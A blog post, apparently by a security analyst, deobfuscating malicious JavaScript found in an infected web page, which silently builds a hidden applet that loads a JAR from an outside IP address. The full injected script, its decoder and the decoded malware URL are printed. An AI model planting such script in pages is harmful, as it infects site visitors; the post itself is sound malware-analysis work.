Translate

Friday, December 7, 2012

Obfuscated HTML Applet Tags


Recently I was passed some PCAP that contained an infected HTML page, JAR and an executable.  The analyst working the PCAP was wondering how the JAR was downloaded as there was no applet tags on the infected page or any indication in the PCAP that a JAR would be downloaded.

So I ran head on into the PCAP and started with the infected page.  Any analyst can clearly pickup on evil JavaScript hidden in an HTML page and so I noticed about half way down the page the following;

<body><script language="javascript"> var ws=new Date(); ws.setDate(12+ws.getDate()); document.cookie="stats=446501053769c06c565094b26d26e8ef; path=/; expires="+ ws.toGMTString(); jhi=1*1; ybw="iuuq;00"; </script><script language="javascript">var dpjjunt = function(laaqig){var onu = function(ykh)
{var eam, wun, i; var qex=""; eam = ykh.length; for (i = 0; i < eam; ++i) {wun = ykh.charCodeAt(i)-jhi;qex = qex + String.fromCharCode(wun);} return(qex); }
var grxolm=document.createElement(onu("bqqmfu"));grxolm.setAttribute(onu("dpef"), onu("sgiwcz/sxbsrwlfemvh/dmbtt"));grxolm.setAttribute(onu("bsdijwf"), " "+onu(ybw+"75/45/294/222;9191034658:7827023341"));grxolm.setAttribute(onu("xjeui"), "1");grxolm.setAttribute(onu("ifjhiu"), "1");var arvtie=document.createElement(onu("qbsbn"));arvtie.setAttribute(onu("obnf"),onu("higmcoqmlvflhbvrlkhm"));arvtie.setAttribute(onu("wbmvf"),onu("8cc9gf2fbc97c4ebcbb5b8ceb:18dfc88:b83fg464g:6e5gg457742363b4"));grxolm.appendChild(arvtie);document.body.appendChild(grxolm); } ;
dpjjunt(1);</script></body>

So if we copy out this JS and make it a little more pretty for us we can read it a bit better.



var ws=new Date();
 ws.setDate(12+ws.getDate());
 document.cookie="stats=446501053769c06c565094b26d26e8ef;
 path=/;
 expires="+ ws.toGMTString();
 jhi=1*1;
 ybw="iuuq;00";

var dpjjunt = function(laaqig)
 {
   var onu = function(ykh)
   {
     var eam, wun, i;
     var qex="";
     eam = ykh.length;
     for (i = 0;
     i < eam;
     ++i)
     {
       wun = ykh.charCodeAt(i)-jhi;
       qex = qex + String.fromCharCode(wun);
     }
     return(qex);
   
   }
   var grxolm=document.createElement(onu("bqqmfu"));
   grxolm.setAttribute(onu("dpef"), onu("sgiwcz/sxbsrwlfemvh/dmbtt"));
   grxolm.setAttribute(onu("bsdijwf"), " "+onu(ybw+"75/45/294/222;
   9191034658:7827023341"));
   grxolm.setAttribute(onu("xjeui"), "1");
   grxolm.setAttribute(onu("ifjhiu"), "1");
   var arvtie=document.createElement(onu("qbsbn"));
   arvtie.setAttribute(onu("obnf"),onu("higmcoqmlvflhbvrlkhm"));
   arvtie.setAttribute(onu("wbmvf"),onu("8cc9gf2fbc97c4ebcbb5b8ceb:18dfc88:b83fg464g:6e5gg457742363b4"));
   grxolm.appendChild(arvtie);
   document.body.appendChild(grxolm);
 
 }
 ;
 dpjjunt(1);


This is our Applet builder!  The top script holds some key information we will need to correctly build this applet.  First we see  jhi=1*1;  and  ybw="iuuq;00";  These are important because these variables hold values further down in the script.  So lets quickly solve these.  jhi=1 and for the mean time we will replace ybw with "iuuq;00".

If you are still following me lets move down to the builder.  The main function is "onu"  this function will take one input (ykh) and iterate through a loop to return our desired string.  Perfect so lets build our final script now.


var onu = function(ykh)
 {
   var eam, wun, i;
   var qex="";
   eam = ykh.length;
   for (i = 0; i < eam; ++i)
       {
  wun = ykh.charCodeAt(i)-1;
  qex = qex + String.fromCharCode(wun);
}
   return(qex);
}
var a = (onu("bqqmfu"));
var b = (onu("dpef"));
var c = (onu("sgiwcz/sxbsrwlfemvh/dmbtt"));
var d = (onu("bsdijwf"));
var e = (onu("iuuq;00"+"75/45/294/222;9191034658:7827023341"));
var f = (onu("xjeui"), "1");
var g = (onu("ifjhiu"), "1");
var h = (onu("qbsbn"));
var i = (onu("obnf"));
var j = (onu("higmcoqmlvflhbvrlkhm"));
var k = (onu("wbmvf"));
var l = (onu("8cc9gf2fbc97c4ebcbb5b8ceb:18dfc88:b83fg464g:6e5gg457742363b4"));

I prefer to use Rhino on scripts like these so I have alphabetized the variables for easy viewing.  One run through and we find the variables deobfuscate to the the following;

var a = applet
var b = code
var c = rfhvby.rwarqvkedlug.class
var d = archive
var e = http://64.34.183.111:8080/2354796716/12230
var f = width=1
var g = height=1
var h = param
var j = name
var k = ghflbnplkuekgauqkjgl
var l = value
var m = 7bb8fe1eab86b3dabaa4a7bda907ceb779a72ef353f95d4ff346631252a3

We have a complete applet with the archive location for the JAR at http://64.34.183.111:8080/2354796716/12230 and a param name and value.

#MalwareMustDie

No comments:

Post a Comment